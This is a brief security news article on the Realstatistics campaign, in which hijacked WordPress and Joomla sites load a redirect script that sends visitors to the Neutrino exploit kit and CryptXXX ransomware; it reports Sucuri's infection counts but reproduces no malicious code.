Crooks are using out-of-date CMSs, mainly WordPress and Joomla sites, to hijack Web traffic and redirect users to rogue websites hosting the Neutrino exploit kit that’s infecting victims with the CryptXXX ransomware.
According to Web security firm Sucuri, this latest campaign, dubbed Realstatistics, has been raging on for the past two weeks, with at least 100 new infected websites detected every day, based on the company’s telemetry data.
Over 2,000 sites already infected
All in all, the company says it detected at least 2,000 sites affected by the campaign. Since the data comes from sites using the Sucuri site checker, this number could be actually higher. Sucuri founder and CTO Daniel Cid says the real number could be five times bigger.
Looking at all the infected systems, Cid says that around 90 percent of all sites are running some sort of CMS platform and that WordPress and Joomla account together for 60 percent of that total.
Looking at the CMS version numbers, it doesn’t appear that crooks are leveraging a core vulnerability, since up-to-date sites are also compromised, meaning that Realstatistics authors are most likely using vulnerabilities in plugins to hack these websites.
Crooks load malicious JS code from the realstatistics[.]pro domain
The name Realstatistics comes from the realstatistics[.]info and the realstatistics[.]pro domains used in the campaign. Crooks are hijacking these sites and are adding a malicious JS script loaded from these two domains. Only the last domain is active now, being deployed on hijacked sites after July 1.
The rogue script is responsible for diverting incoming traffic and redirecting users to another URL hosting the Neutrino exploit kit. Here, using Flash or PDF Reader vulnerabilities, the exploit kit pushes the CryptXXX ransomware on PCs running out-of-date & vulnerable versions of this software.
Google has started detecting the malicious source code added to these sites and has begun flagging infected domains.
Users that want to check their sites can use, or they can look for the following code in their website’s source code.